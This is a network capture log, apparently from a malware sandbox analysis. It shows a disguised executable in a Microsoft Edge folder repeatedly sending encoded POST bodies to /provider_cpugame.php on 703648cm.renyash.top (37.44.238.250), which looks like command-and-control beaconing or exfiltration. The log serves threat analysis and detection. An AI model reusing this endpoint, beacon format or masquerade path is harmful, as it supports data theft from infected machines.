                                                                                                                      Dec 20, 2024 21:18:42.645009041 CET | 2644 | OUT | Data Raw: 58 5f 5f 5e 5d 5b 54 51 5a 5b 5b 52 55 55 51 57 58 59 59 45 52 52 54 5d 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X__^][TQZ[[RUUQWXYYERRT]][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!B)X/]>%$=.]&49.X)4$^!*!02'#19$>#G!"^,/
                                                                                                                      Dec 20, 2024 21:18:43.565392017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:43.804444075 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:41 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      43 | 192.168.2.4 | 49878 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:44.044912100 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:44.394951105 CET | 2644 | OUT | Data Raw: 5d 5b 5f 55 5d 5c 51 55 5a 5b 5b 52 55 54 51 50 58 5a 59 46 52 56 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][_U]\QUZ[[RUTQPXZYFRVTX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"*X+)!Z&-!9;4&X(4,$(=T?,'+?5*'#G!"^,+
                                                                                                                      Dec 20, 2024 21:18:45.318016052 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:45.552259922 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:43 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      44 | 192.168.2.4 | 49884 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:45.796358109 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:46.144993067 CET | 2644 | OUT | Data Raw: 58 59 5f 55 5d 5b 54 51 5a 5b 5b 52 55 55 51 54 58 5c 59 45 52 50 54 5f 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XY_U][TQZ[[RUUQTX\YERPT_][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\">+\? :$-!9 >Z>$;Y%85(T3'+<\!!&.#G!"^,/
                                                                                                                      Dec 20, 2024 21:18:47.066512108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:47.300102949 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:45 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      45 | 192.168.2.4 | 49889 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:47.544636965 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:47.894881010 CET | 2644 | OUT | Data Raw: 58 58 5f 56 5d 5f 54 52 5a 5b 5b 52 55 5f 51 54 58 5d 59 40 52 5d 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XX_V]_TRZ[[RU_QTX]Y@R]T\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!><>)[0=98)#1=4'$;%<#T%;$X55S3#G!"^,
                                                                                                                      Dec 20, 2024 21:18:48.815921068 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:49.048188925 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:47 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      46 | 192.168.2.4 | 49893 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:49.295562029 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:49.645193100 CET | 2644 | OUT | Data Raw: 5d 5b 5a 57 58 5a 54 5e 5a 5b 5b 52 55 5e 51 52 58 53 59 42 52 50 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][ZWXZT^Z[[RU^QRXSYBRPTX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!G+>Y?#2$!-1!*=$;0;9V*!#&/6='.#G!"^,
                                                                                                                      Dec 20, 2024 21:18:50.565597057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:50.804681063 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:48 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      47 | 192.168.2.4 | 49897 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:51.044424057 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:51.395019054 CET | 2644 | OUT | Data Raw: 58 59 5f 54 5d 58 54 51 5a 5b 5b 52 55 5e 51 56 58 5c 59 40 52 57 54 5d 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XY_T]XTQZ[[RU^QVX\Y@RWT]][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!).+>0*\9;67X)B$3%(& Y6!3>#G!"^,
                                                                                                                      Dec 20, 2024 21:18:52.325829983 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:52.561688900 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:50 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      48 | 192.168.2.4 | 49903 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:52.815419912 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:53.160545111 CET | 2644 | OUT | Data Raw: 58 58 5f 52 58 5a 54 52 5a 5b 5b 52 55 54 51 50 58 5e 59 44 52 53 54 59 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XX_RXZTRZ[[RUTQPX^YDRSTY][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\")?[>#3.,8&!*:)4;Z'6?"3%8 \"W)3>#G!"^,+
                                                                                                                      Dec 20, 2024 21:18:54.085952044 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:54.324384928 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:52 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      49 | 192.168.2.4 | 49910 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:54.579925060 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:54.926150084 CET | 2644 | OUT
                                                                                                                      Dec 20, 2024 21:18:55.849172115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:56.084470987 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:54 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      50 | 192.168.2.4 | 49915 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:56.324529886 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:56.676212072 CET | 2644 | OUT
                                                                                                                      Dec 20, 2024 21:18:57.596350908 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:57.832025051 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:55 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      51 | 192.168.2.4 | 49919 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:58.076692104 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:58.426268101 CET | 2644 | OUT
                                                                                                                      Dec 20, 2024 21:18:59.348875999 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:59.584338903 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:57 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      52 | 192.168.2.4 | 49922 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:59.842746973 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:00.191848040 CET | 2644 | OUT
                                                                                                                      Dec 20, 2024 21:19:01.117680073 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:01.356400013 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:59 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      53 | 192.168.2.4 | 49928 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:19:01.594738960 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:01.941922903 CET | 2644 | OUT
                                                                                                                      Dec 20, 2024 21:19:02.879728079 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:03.112612963 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:01 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      54 | 192.168.2.4 | 49935 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:19:03.360683918 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:03.707406044 CET | 2644 | OUT
                                                                                                                      Dec 20, 2024 21:19:04.631318092 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:04.864053965 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:02 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      55 | 192.168.2.4 | 49940 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:19:05.107431889 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:05.458259106 CET | 2644 | OUT
                                                                                                                      Dec 20, 2024 21:19:06.383505106 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:06.616213083 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:04 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      56 | 192.168.2.4 | 49946 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:19:06.856707096 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:07.207386017 CET | 2644 | OUT
                                                                                                                      Dec 20, 2024 21:19:08.127427101 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:08.364594936 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:06 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      57 | 192.168.2.4 | 49949 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:19:08.610519886 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:08.957770109 CET | 2644 | OUT
                                                                                                                      Dec 20, 2024 21:19:09.881637096 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:10.116483927 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:08 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49954 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:19:10.362140894 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:19:10.737970114 CET | 2644 | OUT | (request body data)
Dec 20, 2024 21:19:10.990228891 CET | 1236 | OUT | (request body data)
Dec 20, 2024 21:19:11.634597063 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:19:11.872221947 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:09 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
